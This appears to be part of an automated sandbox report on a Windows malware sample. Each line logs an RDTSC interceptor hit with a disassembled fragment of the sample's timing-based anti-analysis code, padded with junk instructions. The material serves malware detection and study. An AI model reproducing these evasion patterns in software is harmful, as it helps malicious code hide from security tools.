                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10AE2BD second address: 10AE2C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10AE2C1 second address: 10AE2D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F449CEB073Eh 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10AE011 second address: 10AE034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D7Eh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F449CC63D7Ah 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10AE034 second address: 10AE04B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F449CEB0742h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10B107A second address: 10B107E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10B107E second address: 10B108A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10B4FA5 second address: 10B4FC1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F449CC63D7Eh 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10B517E second address: 10B519B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F449CEB0741h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10B519B second address: 10B51AA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F449CC63D76h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10BDB52 second address: 10BDB69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10BDB69 second address: 10BDB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10BDB6D second address: 10BDB79 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F449CEB0736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10C63C8 second address: 10C63D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F449CC63D76h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10C63D6 second address: 10C63DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10C903C second address: 10C9056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10C9056 second address: 10C905A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10CB76E second address: 10CB773 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10CB773 second address: 10CB779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10CE98C second address: 10CE9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F449CC63D88h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10CE9AB second address: 10CE9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D5B45 second address: 10D5B5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F449CC63D76h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F449CC63D76h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D5B5B second address: 10D5B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D45B9 second address: 10D45BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D45BD second address: 10D45C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D45C3 second address: 10D45C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4868 second address: 10D487E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F449CEB073Ah 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D487E second address: 10D4882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4882 second address: 10D48A7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F449CEB0748h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4A05 second address: 10D4A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007F449CC63D76h 0x0000000b jmp 00007F449CC63D7Dh 0x00000010 jmp 00007F449CC63D88h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4A37 second address: 10D4A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4A41 second address: 10D4A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4BAB second address: 10D4BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F449CEB0746h 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4BC6 second address: 10D4BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F449CC63D76h 0x00000009 jmp 00007F449CC63D7Fh 0x0000000e jp 00007F449CC63D76h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4D27 second address: 10D4D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D8A4E second address: 10D8A7D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F449CC63D7Eh 0x00000008 jmp 00007F449CC63D7Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F449CC63D78h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D8A7D second address: 10D8A87 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D8A87 second address: 10D8A8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D8A8C second address: 10D8A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D8638 second address: 10D863E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D863E second address: 10D8643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D8643 second address: 10D8664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D81h 0x00000009 jns 00007F449CC63D76h 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D87BD second address: 10D87C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F449CEB0736h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D87C7 second address: 10D87CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10E67A5 second address: 10E67AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10E67AB second address: 10E67C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D89h 0x00000009 popad 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10E67C9 second address: 10E67D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10F7E72 second address: 10F7E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10F7E7E second address: 10F7E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10F7E83 second address: 10F7E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10F7E89 second address: 10F7E96 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111556F second address: 1115575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1115575 second address: 1115579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1115579 second address: 1115587 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1115587 second address: 11155A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CEB0745h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 11143B0 second address: 11143B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 11143B4 second address: 11143E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jno 00007F449CEB074Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F449CEB0736h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111457B second address: 1114587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 js 00007F449CC63D76h 0x0000000b pop ecx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1114701 second address: 1114709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1114709 second address: 1114713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F449CC63D76h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1114D18 second address: 1114D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 js 00007F449CEB0736h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1114D27 second address: 1114D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1116C39 second address: 1116C3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111AEC9 second address: 111AECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111AECD second address: 111AEEB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jmp 00007F449CEB073Eh 0x00000014 pop esi 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111AEEB second address: 111AEF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111AEF0 second address: 111AEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111AFB3 second address: 111AFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111AFB7 second address: 111AFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111AFBD second address: 111B011 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F449CC63D7Eh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pop eax 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jmp 00007F449CC63D80h 0x0000001f push ebx 0x00000020 pushad 0x00000021 popad 0x00000022 pop ebx 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push ebx 0x0000002a pop ebx 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111B25F second address: 111B263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111B263 second address: 111B2BF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e or dx, E466h 0x00000013 jmp 00007F449CC63D88h 0x00000018 push dword ptr [ebp+122D3206h] 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F449CC63D78h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 push 60DC85E5h 0x0000003d push eax 0x0000003e push edx 0x0000003f push esi 0x00000040 push eax 0x00000041 pop eax 0x00000042 pop esi 0x00000043 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5620159 second address: 56201E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F449CEB0740h 0x0000000f push eax 0x00000010 jmp 00007F449CEB073Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F449CEB0746h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e push eax 0x0000001f jmp 00007F449CEB073Dh 0x00000024 pop ecx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushfd 0x00000028 jmp 00007F449CEB0747h 0x0000002d or al, FFFFFFDEh 0x00000030 jmp 00007F449CEB0749h 0x00000035 popfd 0x00000036 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600DD8 second address: 5600DDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600DDE second address: 5600E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, DC33h 0x00000007 mov si, 088Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F449CEB073Eh 0x00000018 or eax, 26B49438h 0x0000001e jmp 00007F449CEB073Bh 0x00000023 popfd 0x00000024 movzx esi, bx 0x00000027 popad 0x00000028 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5600E15 second address: 5600E1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 565003F second address: 5650043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5650043 second address: 5650052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5650052 second address: 5650058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5650058 second address: 565005C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 565005C second address: 5650060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5650060 second address: 5650078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F449CC63D7Dh 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5650078 second address: 5650088 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CEB073Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0140 second address: 55E0150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D7Ch 0x00000009 rdtsc
